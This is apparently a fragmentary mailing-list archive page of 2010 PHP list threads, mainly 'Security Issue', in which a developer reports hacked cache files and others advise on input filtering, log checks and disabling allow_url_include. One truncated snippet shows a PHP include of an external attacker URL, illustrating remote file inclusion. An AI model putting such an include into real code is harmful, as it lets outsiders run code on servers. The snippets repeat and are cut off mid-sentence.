one good reason to ever enable this, it would be a
security issue no matter how you slice it...
-Original Message-
From: Igor Escobar [mailto:titiolin...@gmail.com]
Sent: Tuesday, June 08, 2010 10:11 AM
To: richg...@gmail.com
Cc:
Subject: Re: [PHP] Security Issue
Hey Richard,
I'll
Igor Escobar [mailto:titiolin...@gmail.com]
Sent: Tuesday, June 08, 2010 10:11 AM
To: richg...@gmail.com
Cc:
Subject: Re: [PHP] Security Issue
Hey Richard,
I'll find more about this parameter allow_url_include, thank you!
Regards,
Igor Escobar
Systems Analyst & Interface De
Hey Richard,
I'll find more about this parameter allow_url_include, thank you!
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 5:26 PM, richard gray wrote:
> On 07/06/201
Are you running the latest version of PHP?
If not you should check for PHP vulnerabilities for the version that you
have installed. You should also check your OS and web server software for
security holes.
On Mon, Jun 7, 2010 at 7:54 AM, Igor Escobar wrote:
> Hi Folks!
>
> The portal for which
On 07/06/2010 20:00, Igor Escobar wrote:
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.
// my code...
// my
From: Ashley Sheridan
> On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
>
>> PHP Injection is the technical name given to a security hole in PHP
>> applications. When this gap there is a hacker can do with an external
>> code that is interpreted as an inner code as if the code included was
On Mon, 2010-06-07 at 15:00 -0300, Igor Escobar wrote:
> PHP Injection is the technical name given to a security hole in PHP
> applications. When this gap there is a hacker can do with an external
> code that is interpreted as an inner code as if the code included was
> more a part of the script.
I disagree and this kind of approach could be appropriate if you walk
your input globals and apply some sanity checks and appropriate
filtering you could fix the issue.
On Jun 7, 2010, at 10:52 AM, Igor Escobar wrote:
I think we're getting off topic here folks...
Regards,
Igor Escobar
S
I'm totally agree with you Ash,
I came up here to ask you guys some for light. Anything to well me to track
that M%$#% F#$CK#$# and discover from where he's attacking.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igores
PHP Injection is the technical name given to a security hole in PHP
applications. When this gap there is a hacker can do with an external code
that is interpreted as an inner code as if the code included was more a part
of the script.
// my code...
// my code...
include ('http:///externalhacks
Because that only typecasts it. It's safe but it isn't what the user
actually entered.
This way I can actually determine if the user put in "123abc" and
reject it, not accept it and keep the "123" silently for example. Same
with floats. You may or may not consider a negative number acceptab
You could do generic things to modify the $_GET and other superglobal
arrays. For example if you wanted to implement magic quote yourself
have a recursive function (I'd paste one but I'm on my phone) but
something akin to this:
$_GET = your_function_name($_GET);
An idea for you might be to
I think we're getting off topic here folks...
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 2:51 PM, Ashley Sheridan
wrote:
> On Mon, 2010-06-07 at 10:48 -0700, Michael
On Mon, 2010-06-07 at 10:48 -0700, Michael Shadle wrote:
> Oh yeah. I do more than just intval() I make sure they didn't feed me
> anything BUT numeric text first. I do sanity check before type
> forcing :)
>
> I use garbage in garbage out. So I take what is given to me and yes I
> escape i
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:
> It's not a SQL Injection or XSS problem, Michael.
>
> It's a PHP Injection problem. I know how fix that but the web site is very
> very huge, have lots and lots of partners and i'm have a bug difficult do
> identify the focus of the problem
Oh yeah. I do more than just intval() I make sure they didn't feed me
anything BUT numeric text first. I do sanity check before type
forcing :)
I use garbage in garbage out. So I take what is given to me and yes I
escape if before the db of course as well, and then encode on output.
On Ju
On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:
> It's not that bad.
>
> Use filter functions and sanity checks for input.
>
> Use htmlspecialchars() basically on output.
>
> That should take care of basically everything.
>
> On Jun 7, 2010, at 6:16 AM, Igor Escobar wrote:
>
> > Thi
It's not a SQL Injection or XSS problem, Michael.
It's a PHP Injection problem. I know how fix that but the web site is very
very huge, have lots and lots of partners and i'm have a bug difficult do
identify the focus of the problem.
Got it?
Regards,
Igor Escobar
Systems Analyst & Interface Des
It's not that bad.
Use filter functions and sanity checks for input.
Use htmlspecialchars() basically on output.
That should take care of basically everything.
On Jun 7, 2010, at 6:16 AM, Igor Escobar wrote:
This was my fear.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ ht
-Original Message-
From: Igor Escobar [mailto:titiolin...@gmail.com]
Sent: Monday, June 07, 2010 9:21 AM
To: Phpster
Cc:
Subject: Re: [PHP] Security Issue
I do not believe he is doing so through forms but PHP Injection. We have
already met one of the files that he used to make the concatenation of
I do not believe he is doing so through forms but PHP Injection. We have
already met one of the files that he used to make the concatenation of the
cache files. Need to know if there is a tool, anything, that we can install
on the server and identify the hacker more easily because the manual labor
This was my fear.
Regards,
Igor Escobar
Systems Analyst & Interface Designer
+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)
On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind wrote:
> On 7 June 2010 14:54, Igor Escobar wrote:
> > Hi Folks!
> >
> > The portal
Hi Ashley!
Thanks for helping us!
OK, first thing, check all the file access logs, i.e. FTP logs, etc, just to
make sure that it's not a case of a compromised password. There's a
well-known issue with people who use FileZilla on Windows systems that
allows passwords to be easily stolen.
*
*
*We'v
On Jun 7, 2010, at 8:54 AM, Igor Escobar wrote:
Hi Folks!
The portal for which I work is suffering constant attacks that I
feel that
is PHP Injection. Somehow the hacker is getting to change the cache
files
that our system generates. Concatenating the HTML file with another
that
have a
On 7 June 2010 14:54, Igor Escobar wrote:
> Hi Folks!
>
> The portal for which I work is suffering constant attacks that I feel that
> is PHP Injection. Somehow the hacker is getting to change the cache files
> that our system generates. Concatenating the HTML file with another that
> have an ifra
On Mon, 2010-06-07 at 09:54 -0300, Igor Escobar wrote:
> Hi Folks!
>
> The portal for which I work is suffering constant attacks that I feel that
> is PHP Injection. Somehow the hacker is getting to change the cache files
> that our system generates. Concatenating the HTML file with another that
It was able to call up external includes using the below code which
resulted
that the server was used to send out spam.
How can I protect the code?
Is ../inc/ in the web path? $_SERVER['DOCUMENT_ROOT']
If so, then what do you mean by "external includes"? You need to move inc/
to a path unre
Karl,
Some simple checks on $contpath could solve your problem. Make sure that:
- it doesn't start with a /
- doesn't contain /../
- it doesn't contain a double slash //, or make sure the URL Fopen wrapper
is disabled:
http://nl3.php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen
Usuall
Not really sure what you need suggestions on. There are tons
of examples for querying MySQL databases from PHP out
there around the net, not to mention the php.net mysql
area itself.
Scott Novinger wrote:
> Hello,
>
> Would someone please offer some specific suggestions for the following?:
>
> 1. I have several static web pages ready to be published on the
> internet.
Great
> 2. We have chosed PHP, MySQL and Apache as part of our development
> system.
Ok
> 3. I would like to incorporate a PHP script into each static web page
> that queries a MySQL database. This script will de
30 matches
Mail list logo
